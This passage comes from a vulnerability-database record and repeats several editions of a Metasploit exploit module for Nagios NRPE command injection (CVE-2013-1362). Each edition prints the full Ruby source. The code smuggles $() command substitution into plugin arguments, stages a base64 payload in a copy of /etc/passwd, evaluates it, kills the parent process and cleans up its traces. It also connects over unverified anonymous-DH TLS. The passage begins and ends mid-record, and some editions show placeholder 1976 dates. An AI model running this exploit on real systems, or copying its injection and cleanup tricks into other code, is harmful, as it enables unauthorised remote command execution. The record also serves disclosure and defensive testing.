<jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-06T14:12:56", "differentElements": ["modified", "published"], "edition": 62}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-06T16:11:08", "history": [], "viewCount": 95, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-06T16:11:08", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-06T16:11:08", "differentElements": ["modified", "published"], "edition": 63}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-15T10:23:48", "history": [], "viewCount": 95, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-15T10:23:48", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-15T10:23:48", "differentElements": ["modified", "published"], "edition": 64}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-15T12:22:48", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-15T12:22:48", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-15T12:22:48", "differentElements": ["modified", "published"], "edition": 65}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-17T20:29:16", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-17T20:29:16", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << 